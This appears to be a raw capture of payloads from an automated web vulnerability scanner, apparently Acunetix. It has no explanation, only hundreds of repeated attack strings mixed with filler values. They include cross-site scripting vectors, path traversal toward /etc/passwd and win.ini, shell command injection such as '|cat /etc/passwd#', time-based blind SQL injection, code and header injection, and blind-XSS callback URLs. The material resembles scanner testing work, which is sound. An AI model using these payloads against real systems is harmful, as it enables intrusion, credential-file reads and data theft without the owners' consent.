
/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(913539)</sCripT>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

|cat /etc/passwd#

!(()&&!|*|*|

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

-1))

testasp.vulnweb.com

1

'|'ld

'"()

^(#$!@#$)(()))******

v22dScKQ'

/etc/passwd

'

\xf6<img acu onmouseover=prompt(912702) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"|"ld

1

1

19XeUSaV')

"

1

1

1<input autofocus onfocus=prompt(936889)>

1

1

1

${@print(md5(acunetix_wvs_security_test))}

QUszNwoR'))

1

http://hitW0uU3BNGfX.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}\

'

-1

acunetix_wvs_invalid_filename

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

comments

"

-1)

1_ljyPd <ScRiPt >prompt(910922)</ScRiPt>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

||cat /etc/passwd

1

-1))

1

http://www.acunetix.tst

1

1

comments/.

'"

&dir

1

1'"()&%<ScRiPt >prompt(920144)</ScRiPt>

1

yov7CKY5'

1

1

'&dir&'

1

file:///etc/passwd

1

<!--

7m1mJ1Y4')

1

1

'"()&%<ScRiPt >prompt(994857)</ScRiPt>

cSxQHyHy'))

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1_938435

1

1

1

1

WEB-INF/web.xml

|dir

1

1

1

'|dir

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu6643\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6643

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux3958\xc0\xbez1\xc0\xbcz2a\x90bcxuca3958

1

1

................windowswin.ini

1<ScRiPt >prompt(998221)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(992785)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(968270)</ScRiPt>

1

1

1

1

response.write(9296206*9610793)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910922></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1<ScRiPt >prompt(916385)</ScRiPt>

'+response.write(9296206*9610793)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1<video><source onerror="javascript:prompt(962940)">

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(955510)"></g></svg>

../../../../../../../../../../etc/passwd

"+response.write(9296206*9610793)+"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(904806))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100102+99465}

1

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

1

1

WEB-INF\web.xml

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n971366=v925640

cat /etc/passwd

1<body onload=prompt(919517)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968960)>

`cat /etc/passwd`

1

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1<img src=xyz OnErRor=prompt(995802)>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

!(()&&!|*|*|

|cat /etc/passwd#

1<img/src=">" onerror=alert(903488)>

1

testasp.vulnweb.com

1

-1))

'"()

'|'ld

1<ScRiPt%20>prompt(931220)</sCripT>

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

sV792J7Q'

'

1

1

/etc/passwd

1

"|"ld

1&lt

1

"

1

EVAOnUXD')

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

\xf6<img acu onmouseover=prompt(917723) //\xf6>

8H3si6Fm'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(988387)>

'

1

1

-1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

<a href='http://www.acunetix.com'>website security</a>

"

1

-1)

http://hitEE0QKyX5dl.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

-1))

||cat /etc/passwd

1

1

1

1

1_IIRgx <ScRiPt >prompt(952935)</ScRiPt>

file:///etc/passwd

&dir

1

wdLfsgXB'

comments

http://www.acunetix.tst

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(992588)</ScRiPt>

'"

'&dir&'

1

comments/.

9zexZHOe')

1

1

'"()&%<ScRiPt >prompt(992371)</ScRiPt>

1

WEB-INF/web.xml

UpBXR28K'))

1

<!--

1

"&dir&"

1

WEB-INF\web.xml

1

1_905930

1

1

|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

1

'|dir

../../../../../../../../../../boot.ini

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu3348\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3348

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acux6061\xc0\xbez1\xc0\xbcz2a\x90bcxuca6061

1

1

1

1<ScRiPt >prompt(918697)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<script>prompt(976099)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(939662)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?949098></ScRiPt>

1

1

WEB-INF/web.xml

1<ScRiPt >prompt(997186)</ScRiPt>

1

1

1

WEB-INF\web.xml

response.write(9618154*9325758)

1

1

1

1<video><source onerror="javascript:prompt(907663)">

'+response.write(9618154*9325758)+'

1

1

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992947)"></g></svg>

1

1

1<div style=width:expression(prompt(972030))>

'&cat /etc/passwd&'

1

"+response.write(9618154*9325758)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(927978)>

1

cat /etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(976900)>

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=xyz OnErRor=prompt(990710)>

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99196+100190}

1

1<img/src=">" onerror=alert(905377)>

-1)

1

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

-1))

1<ScRiPt%20>prompt(950777)</sCripT>

1

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n901748=v952516

1

UCM0pwN9'

testasp.vulnweb.com

1&lt

1

!(()&&!|*|*|

1

1

xpxEVYYp')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

'"()

\xf6<img acu onmouseover=prompt(979667) //\xf6>

'

1

1RDc5xmN'))

/etc/passwd

1

1<input autofocus onfocus=prompt(965747)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

1

1

-1

'

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

1

1

-1)

&dir

1

[url=http://www.acunetix.com]website security[/url]

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://hitrcQfj3Fy20.bxss.me/

'&dir&'

Qb1EvQ8a'

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}

1_C86wQ <ScRiPt >prompt(999298)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

hZaEcbXc')

1

1

1

"&dir&"

1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

dA0jg3P3'))

|dir

1'"()&%<ScRiPt >prompt(977361)</ScRiPt>

'"

http://www.acunetix.tst

1

1

1

comments/.

file:///etc/passwd

<!--

'"()&%<ScRiPt >prompt(995944)</ScRiPt>

1

1

1

'|dir

1

1

1_966061

/\../\../\../\../\../\../\../etc/passwd

1

1

1

"|dir

1

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acu8012\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8012

../../../../../../../../../../windows/win.ini.jpg

acux6759\xc0\xbez1\xc0\xbcz2a\x90bcxuca6759

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(942120)</ScRiPt>

1

1

................windowswin.ini

1

1

1<script>prompt(911860)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(951184)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?933227></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(979841)</ScRiPt>

1

&cat /etc/passwd&

1

response.write(9015136*9067369)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(947004)">

'&cat /etc/passwd&'

1

'+response.write(9015136*9067369)+'

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944575)"></g></svg>

1

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9015136*9067369)+"

1<div style=width:expression(prompt(927554))>

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

WEB-INF\web.xml

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

`cat /etc/passwd`

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1<body onload=prompt(952711)>

${99046+99893}

|cat /etc/passwd#

1

1

1

1

-1

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963623)>

)

-1)

1

1

1&n922257=v953198

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1<img src=xyz OnErRor=prompt(959847)>

1

1

1

-1))

1<img/src=">" onerror=alert(978829)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

^(#$!@#$)(()))******

1

rqiIfENt'

1

'

1<ScRiPt%20>prompt(921975)</sCripT>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

testasp.vulnweb.com

roKY1iqP')

/etc/passwd

1

1&lt

'

1

1

"

IIwwrXw3'))

1

1

"

\xf6<img acu onmouseover=prompt(917806) //\xf6>

1

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

1<input autofocus onfocus=prompt(944753)>

${@print(md5(acunetix_wvs_security_test))}

1

1

-1)

&dir

http://hitsavO9EIRKw.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

<a href='http://www.acunetix.com'>website security</a>

1

-1))

1

comments

1

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

BUbtp5Pd'

[url=http://www.acunetix.com]website security[/url]

1

1

comments

"&dir&"

1

1_FeP0w <ScRiPt >prompt(970544)</ScRiPt>

uqMPXh7D')

1

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

|dir

1

'"

1

biyHGC6L'))

file:///etc/passwd

http://www.acunetix.tst

1

'|dir

1

1

1

<!--

1

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1'"()&%<ScRiPt >prompt(938236)</ScRiPt>

1

1

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(966994)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

1_983009

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

acu3964\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3964

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

acux5483\xc0\xbez1\xc0\xbcz2a\x90bcxuca5483

1

1

1<ScRiPt >prompt(912886)</ScRiPt>

response.write(9992317*9253819)

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<script>prompt(975819)</script>

1

'+response.write(9992317*9253819)+'

&cat /etc/passwd&

1

1<ScRiPt >prompt(997198)</ScRiPt>

1

WEB-INF/web.xml

'&cat /etc/passwd&'

1

"+response.write(9992317*9253819)+"

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913756></ScRiPt>

WEB-INF\web.xml

1

"&cat /etc/passwd&"

1<ScRiPt >prompt(980208)</ScRiPt>

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(978721)">

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954918)"></g></svg>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

1

1

-1

1

1<div style=width:expression(prompt(966059))>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100144+100164}

|cat /etc/passwd#

-1)

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd.jpg

1&n964258=v920272

1

1

1<body onload=prompt(982088)>

'|'ld

-1))

1

1some_inexistent_file_with_long_name%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990648)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

LPUGln2b'

1<img src=xyz OnErRor=prompt(928131)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

)

1

1

cThHtgLj')

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(909672)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

!(()&&!|*|*|

testasp.vulnweb.com

1<ScRiPt%20>prompt(903808)</sCripT>

'

'"()

1

jLKe1vqL'))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

^(#$!@#$)(()))******

1

'

1&lt

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

1

1

"

\xf6<img acu onmouseover=prompt(906530) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

1

-1)

/etc/passwd

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

1<input autofocus onfocus=prompt(923189)>

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

http://hitwPwbpj4URE.bxss.me/

1

1

comments

&dir

<a href='http://www.acunetix.com'>website security</a>

1

9nFo7NRO'

1

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

XmhPYmH5')

[url=http://www.acunetix.com]website security[/url]

'&dir&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://www.acunetix.tst

comments/.

1

1

"&dir&"

1_LI8du <ScRiPt >prompt(916884)</ScRiPt>

JlR38VMI'))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

|dir

1

1

1

1

1'"()&%<ScRiPt >prompt(908520)</ScRiPt>

<!--

1

1

1

1

'|dir

1

1

file:///etc/passwd

1

'"()&%<ScRiPt >prompt(918694)</ScRiPt>

1

1

"|dir

1

1_950167

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu10021\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10021

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux9686\xc0\xbez1\xc0\xbcz2a\x90bcxuca9686

1

1

1

1<ScRiPt >prompt(981432)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(996026)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

response.write(9405123*9356548)

1<ScRiPt >prompt(951406)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936054></ScRiPt>

1

'+response.write(9405123*9356548)+'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(907480)</ScRiPt>

1

&cat /etc/passwd&

1

"+response.write(9405123*9356548)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'&cat /etc/passwd&'

1

1

1<video><source onerror="javascript:prompt(916211)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980658)"></g></svg>

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

1<div style=width:expression(prompt(939864))>

1

../../../../../../../../../../etc/passwd.jpg

${100475+100085}

cat /etc/passwd

-1

1

WEB-INF/web.xml

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<iframe src='data:text/html

1&n955702=v922877

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml

1

`cat /etc/passwd`

-1)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

1

1<body onload=prompt(944167)>

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994399)>

1

!(()&&!|*|*|

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

X3r8DUtc'

'|'ld

1

^(#$!@#$)(()))******

1

'

1<img src=xyz OnErRor=prompt(997110)>

"|"ld

fc0UTC7i')

1

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<img/src=">" onerror=alert(999861)>

"

1

1

1

1

9MtR4M00'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1<ScRiPt%20>prompt(962992)</sCripT>

1

1

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

1

1

http://hitumnRcKXlkI.bxss.me/

1

1&lt

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

-1)

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

\xf6<img acu onmouseover=prompt(901954) //\xf6>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1<input autofocus onfocus=prompt(963653)>

-1))

1

||cat /etc/passwd

1

1

comments

1

1

http://www.acunetix.tst

-1))

file:///etc/passwd

<a href='http://www.acunetix.com'>website security</a>

comments/.

1

'"

&dir

[url=http://www.acunetix.com]website security[/url]

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(988460)</ScRiPt>

1

l90HvEo7'

1_dWe7t <ScRiPt >prompt(969350)</ScRiPt>

1

<!--

1

'&dir&'

1

PyxMTmzF')

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(965341)</ScRiPt>

1

1

"&dir&"

1

C3eCfYay'))

1

1_944261

1

1

WEB-INF\web.xml

1

1

|dir

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

../../../../../../../../../../boot.ini

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acu4585\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4585

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acux1501\xc0\xbez1\xc0\xbcz2a\x90bcxuca1501

1

1

1

1<ScRiPt >prompt(983437)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9063958*9410613)

1<script>prompt(970114)</script>

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9063958*9410613)+'

1

1<ScRiPt >prompt(990426)</ScRiPt>

1

&cat /etc/passwd&

"+response.write(9063958*9410613)+"

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?926822></ScRiPt>

1

1

'&cat /etc/passwd&'

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt >prompt(945733)</ScRiPt>

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<video><source onerror="javascript:prompt(943742)">

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952089)"></g></svg>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

1

1

-1

1

1<div style=width:expression(prompt(966571))>

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1<iframe src='data:text/html

-1)

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

